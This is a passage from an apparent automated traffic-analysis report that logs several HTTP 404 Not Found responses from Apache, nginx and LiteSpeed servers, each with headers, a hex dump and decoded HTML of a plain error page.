6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:58:09 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:58:11 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 15:58:14 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:58:28 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:58:31 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:58:34 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:58:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:58:59 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 09 Jan 2025 15:59:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
